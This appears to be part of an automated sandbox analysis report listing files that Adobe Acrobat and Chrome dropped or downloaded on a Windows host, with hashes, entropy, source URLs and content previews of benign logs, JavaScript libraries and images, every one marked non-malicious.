                                                                                                        SHA-256:C16C171ABCDD7ACED4B0057CE38F258202E0D58D7073687E9188185FCD986823
                                                                                                        SHA-512:7C4FBE08BBD6F49ACE26993266A25EDF801B1436FE2A7E85181C40D025FC76D51622D6BCD0D0C7FCBCC079D0873B48970F11E70F4A680C1426A8587E69A1EEF7
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=d5474c55-9cfd-462e-ab41-a583cbfb9517.1734544115104 Timestamp=2024-12-18T12:48:35:104-0500 ThreadID=7220 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=d5474c55-9cfd-462e-ab41-a583cbfb9517.1734544115104 Timestamp=2024-12-18T12:48:35:106-0500 ThreadID=7220 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=d5474c55-9cfd-462e-ab41-a583cbfb9517.1734544115104 Timestamp=2024-12-18T12:48:35:106-0500 ThreadID=7220 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=d5474c55-9cfd-462e-ab41-a583cbfb9517.1734544115104 Timestamp=2024-12-18T12:48:35:106-0500 ThreadID=7220 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=d5474c55-9cfd-462e-ab41-a583cbfb9517.1734544115104 Timestamp=2024-12-18T12:48:35:106-0500 ThreadID=7220 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):35721
                                                                                                        Entropy (8bit):5.414080942888511
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRe:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRU
                                                                                                        MD5:C058EB56E2AD0F6B31F821BE76E0F5ED
                                                                                                        SHA1:D453D0984563397D196CC422801E8D33DFA24940
                                                                                                        SHA-256:9FDA7FEAE170656FE6C31EB11C6611012AADFF4813DEC83B06D8AB29058426E6
                                                                                                        SHA-512:4F333C8DF0E606EC94C743CC07C7F36908E541C58B88B24FF7B6129A35ED956AD6DEDB5FDA7B3B26707970CB799909DA74B2DE94B02BF5256755D69300BE99E1
                                                                                                        Malicious:false
                                                                                                        Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1419751
                                                                                                        Entropy (8bit):7.976496077007677
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru
                                                                                                        MD5:CA6B0D9F8DDC295DACE8157B69CA7CF6
                                                                                                        SHA1:6299B4A49AB28786E7BF75E1481D8011E6022AF4
                                                                                                        SHA-256:A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7
                                                                                                        SHA-512:9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                        Category:dropped
                                                                                                        Size (bytes):758601
                                                                                                        Entropy (8bit):7.98639316555857
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                        Malicious:false
                                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1407294
                                                                                                        Entropy (8bit):7.97605879016224
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                                                        MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                                                        SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                                                        SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                                                        SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                        Category:dropped
                                                                                                        Size (bytes):386528
                                                                                                        Entropy (8bit):7.9736851559892425
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                        Malicious:false
                                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):48316
                                                                                                        Entropy (8bit):5.6346993394709
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                        Malicious:false
                                                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4054
                                                                                                        Entropy (8bit):7.797012573497454
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                        MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                        SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                        SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                        SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:very short file (no magic)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1
                                                                                                        Entropy (8bit):0.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:U:U
                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                        Malicious:false
                                                                                                        Preview:1
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):513
                                                                                                        Entropy (8bit):5.350826451115093
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                                        MD5:602C381194795DFC124FACDF48492EF1
                                                                                                        SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                                        SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                                        SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                                        Malicious:false
                                                                                                        URL:https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
                                                                                                        Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):89501
                                                                                                        Entropy (8bit):5.289893677458563
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                        Malicious:false
                                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):513
                                                                                                        Entropy (8bit):5.350826451115093
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:D0rdkqmKlO30kMWznLPQspwlZpqBijDgrgLCpWRG3a0:exmwOkkMWIvv4ELsWUp
                                                                                                        MD5:602C381194795DFC124FACDF48492EF1
                                                                                                        SHA1:90D594B7B5AF217824F2974514548C95FECFBFA5
                                                                                                        SHA-256:BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
                                                                                                        SHA-512:8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
                                                                                                        Malicious:false
                                                                                                        Preview:var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined||ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN||"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:ASCII text, with very long lines (41651)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):131537
                                                                                                        Entropy (8bit):5.2237799798561975
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:1f/HuF3CpxEIqQ0/9d1EwgXAnKxnKKviV:1f/HuZ1ILGV
                                                                                                        MD5:30B7C335C62E5269E2D35B8E8B9F44B4
                                                                                                        SHA1:C6D92B1516EB8F6D44AAF171FB24A1B2AADD0C4C
                                                                                                        SHA-256:10733A5D876108F81C5F78EEE5C9760A739D89C52FA6180C4290B7F909F24346
                                                                                                        SHA-512:5BCE247C84C88F993A857CE2F1E8540C648672DEB6D92A55BC808C33394B784C52866D635BEC8B7CD5E62A7EA4109569AC8BCD1381571B84592ACD6C5901D7A8
                                                                                                        Malicious:false
                                                                                                        Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):17174
                                                                                                        Entropy (8bit):2.9129715116732746
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                        Malicious:false
                                                                                                        URL:https://www.microsoft.com/favicon.ico?v2
                                                                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                                                        Category:downloaded
                                                                                                        Size (bytes):201253
                                                                                                        Entropy (8bit):2.661810841903416
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S01:WHGiOoHuOjr3+AKyKAXS
                                                                                                        MD5:85DE642E1467807F64F7E10807DF3869
                                                                                                        SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                                                        SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
